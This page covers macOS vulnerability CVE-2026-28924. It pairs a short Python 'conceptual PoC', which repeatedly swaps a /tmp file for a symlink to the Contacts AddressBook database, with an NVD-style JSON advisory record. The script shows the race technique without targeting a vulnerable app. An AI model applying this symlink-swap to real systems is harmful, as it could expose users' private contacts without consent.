CVE-2026-28924

import os import time # Conceptual PoC demonstrating a Race Condition on Symbolic Links # This script simulates the window of opportunity between a security check and file access. def symbolic_link_race_demo(): # The benign file that the app intends to access benign_file = "/tmp/safe_file.txt" # The sensitive target (e.g., Contacts database) sensitive_target = "/private/var/db/AddressBook/AddressBook.sqlitedb" print("[*] Creating benign file...") with open(benign_file, 'w') as f: f.write("This is safe content.") print("[*] Starting race condition loop...") try: for i in range(100): # Simulate the race: Swap the file with a symlink to the sensitive target if os.path.islink(benign_file): os.unlink(benign_file) elif os.path.exists(benign_file): os.remove(benign_file) # Create symlink pointing to sensitive data os.symlink(sensitive_target, benign_file) print(f"[+] Attempt {i}: Symlink created pointing to {sensitive_target}") # In a real exploit, the vulnerable app would read 'benign_file' now, # inadvertently following the symlink to the sensitive data. time.sleep(0.01) except Exception as e: print(f"Error: {e}") finally: # Cleanup if os.path.islink(benign_file): os.unlink(benign_file) if __name__ == "__main__": symbolic_link_race_demo()

{"cve": {"id": "CVE-2026-28924", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:18:54.727", "lastModified": "2026-05-12T17:24:52.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A race condition was addressed with improved handling of symbolic links. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to access Contacts without user consent."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-362"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.7", "matchCriteriaId": "DD9E7FAE-30DA-4B2B-A63A-6DFEA7A29933"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.7", "matchCriteriaId": "2984C440-3DC2-413A-B5FA-1FAB21078DB8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127116", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127117", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}